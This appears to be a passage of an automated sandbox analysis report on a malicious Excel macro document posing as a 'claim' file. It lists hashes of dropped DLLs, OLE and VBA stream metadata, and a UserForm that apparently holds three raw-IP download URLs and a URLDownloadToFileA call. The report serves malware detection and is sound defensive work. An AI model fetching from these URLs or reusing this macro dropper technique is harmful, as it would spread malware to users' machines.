          SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
          SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
          Malicious:true
          Joe Sandbox View:
          • Filename: Claim-680517779-09242021.xls, Detection: malicious, Browse
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\Fiosa1.der
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):97972
          Entropy (8bit):6.4820203315285045
          Encrypted:false
          SSDEEP:1536:Ch2iZdxbqIVTmfhPsWlX3JfllZyvhK9t56IjIHtUgRf//YLzD+ari29:Ch2SPbqzPtnbvDaf//YvD+l29
          MD5:344C7B31F7C31D4FA66933403EDFCC44
          SHA1:D3A146B93F63FDDE56FA77F40813CBB5E4B70B0C
          SHA-256:D6ECA3E2A2C23F7768851F6111A638B853E05B83C01593EE95AD135FBE84F741
          SHA-512:9DF062C0DEDE3B00627F319A3FA374E80E1136149CAC113DC5308C00A84F4DB8B8C875EC3AF68097735DF06177696521B4FA7829C04D5413AD6D58A9F5E17D07
          Malicious:true
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\Fiosa2.der
          Process:C:\Windows\SysWOW64\explorer.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):495616
          Entropy (8bit):1.3741485480829125
          Encrypted:false
          SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
          MD5:15C440CEBA523F1FA008FAA03D09AC99
          SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
          SHA-256:4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
          SHA-512:BB4BDCB8D8B76420E97DE1469A0B41B6F8F585751E84FE2ACD6C4230822818B6FF2643CB511DE0D8F1B05B0B3FB6FB8063D587219D22F822FF62F66859F6A6B4
          Malicious:true
          Joe Sandbox View:
          • Filename: Claim-680517779-09242021.xls, Detection: malicious, Browse
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................

          Static File Info

          General

          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri Sep 24 10:05:02 2021, Security: 0
          Entropy (8bit):7.828790165256729
          TrID:
          • Microsoft Excel sheet (30009/1) 47.99%
          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
          File name:Claim-1763045001-09242021.xls
          File size:419328
          MD5:7a4ee63e2e2aacea7ffa5d4f27261347
          SHA1:c47ebf9357eaa3984e2a977a77469f2097004bda
          SHA256:3776549225fea6c85372989034fb8d4d0d94eeca4ba33e8473d50898afea6533
          SHA512:cb15fb771a78d7e1287135221322e3a1b7b5aa668f25e82a7f37381e33b676d2b573527961ecd6485b5fa38330e75380c14c9a86224fdfdba617ff585c965ffa
          SSDEEP:6144:Fk3hOdsylKlgxopeiBNhZF+E+W2kdAKTwapS+PS82DPz6ST4+e3G0Sb8duSgcVwN:e5Z8etSwuSgcfPwJjxwrcNDTfsXo/x3
          File Content Preview:........................>.......................................................b.......d.......f..............................................................................................................................................................

          File Icon

          Icon Hash:e4eea286a4b4bcb4

          Static OLE Info

          General

          Document Type:OLE
          Number of OLE Files:1

          OLE File "Claim-1763045001-09242021.xls"

          Indicators

          Has Summary Info:True
          Application Name:Microsoft Excel
          Encrypted Document:False
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:
          Flash Objects Count:
          Contains VBA Macros:True

          Summary

          Code Page:1251
          Author:Test
          Last Saved By:Test
          Create Time:2015-06-05 18:17:20
          Last Saved Time:2021-09-24 09:05:02
          Creating Application:Microsoft Excel
          Security:0

          Document Summary

          Document Code Page:1251
          Thumbnail Scaling Desired:False
          Company:
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:1048576

          Streams with VBA

          VBA File Name: UserForm1, Stream Size: -1
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1
          VBA File Name:UserForm1
          Stream Size:-1
          Data ASCII:
          Data Raw:
          VBA Code
          VBA File Name: Module1, Stream Size: 4112
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Module1
          VBA File Name:Module1
          Stream Size:4112
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 30 0d 00 00 00 00 00 00 01 00 00 00 41 a1 0d 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          VBA Code
          VBA File Name: Sheet1, Stream Size: 991
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
          VBA File Name:Sheet1
          Stream Size:991
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 41 a1 f7 99 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          VBA Code
          VBA File Name: ThisWorkbook, Stream Size: 2774
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
          VBA File Name:ThisWorkbook
          Stream Size:2774
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . A . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:01 16 03 00 00 f0 00 00 00 a2 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff aa 04 00 00 5e 08 00 00 00 00 00 00 01 00 00 00 41 a1 88 0a 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          VBA Code
          VBA File Name: UserForm1, Stream Size: 1180
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
          VBA File Name:UserForm1
          Stream Size:1180
          Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . A . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 41 a1 c5 51 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          VBA Code

          Streams

          Stream Path: \x1CompObj, File Type: data, Stream Size: 108
          General
          Stream Path:\x1CompObj
          File Type:data
          Stream Size:108
          Entropy:4.18849998853
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
          General
          Stream Path:\x5DocumentSummaryInformation
          File Type:data
          Stream Size:244
          Entropy:2.65175227267
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
          General
          Stream Path:\x5SummaryInformation
          File Type:data
          Stream Size:208
          Entropy:3.30164724619
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . 3 . B # . . . . . . . . . . .
          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 391141
          General
          Stream Path:Workbook
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:391141
          Entropy:7.94597570807
          Base64 Encoded:True
          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . d . % 8 . . . . . . . X . @
          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
          Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 661
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECT
          File Type:ASCII text, with CRLF line terminators
          Stream Size:661
          Entropy:5.27224586563
          Base64 Encoded:True
          Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
          Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 50 61 63 6b 61
          Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
          File Type:data
          Stream Size:116
          Entropy:3.35524796933
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00
          Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
          File Type:data
          Stream Size:97
          Entropy:3.61064918306
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 301
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
          File Type:ASCII text, with CRLF line terminators
          Stream Size:301
          Entropy:4.64742015018
          Base64 Encoded:True
          Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
          Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69
          Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 263
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1/f
          File Type:data
          Stream Size:263
          Entropy:3.59027175124
          Base64 Encoded:False
          Data ASCII:. . $ . . . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . O
          Data Raw:00 04 24 00 08 0c 10 0c 04 00 00 00 ff ff 00 00 04 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 04 00 00 00 b4 00 00 00 00 84 01 01 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 a7 01 00 00 d4
          Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 272
          General
          Stream Path:_VBA_PROJECT_CUR/UserForm1/o
          File Type:data
          Stream Size:272
          Entropy:3.7315998228
          Base64 Encoded:True
          Data ASCII:. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 3 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 1 1 . 9 0 . 1 4 8 . 1 0 4 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 5 1 . 8 9 . 1 1 5 . 1 1 1 / . . . . . . . . . . . . . . . 5 . . . . . . .
          Data Raw:00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 33 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 03 18 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 01 f4
          Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3819
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
          File Type:data
          Stream Size:3819
          Entropy:4.49037503963
          Base64 Encoded:False
          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
          Data Raw:cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2035
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
          File Type:data
          Stream Size:2035
          Entropy:3.42846113886
          Base64 Encoded:False
          Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . $ . . . . D . Q . . . . = s . . . . . . . .
          Data Raw:93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 138
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
          File Type:data
          Stream Size:138
          Entropy:1.48462480805
          Base64 Encoded:False
          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 6a 00 00 00 00 00
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 264
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
          File Type:data
          Stream Size:264
          Entropy:1.9985725068
          Base64 Encoded:False
          Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . N . . . . . . .
          Data Raw:72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 256
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
          File Type:data
          Stream Size:256
          Entropy:1.80540314317
          Base64 Encoded:False
          Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
          Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
          Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: SVR2 executable (USS/370) not stripped - version 12587540, Stream Size: 865
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/dir
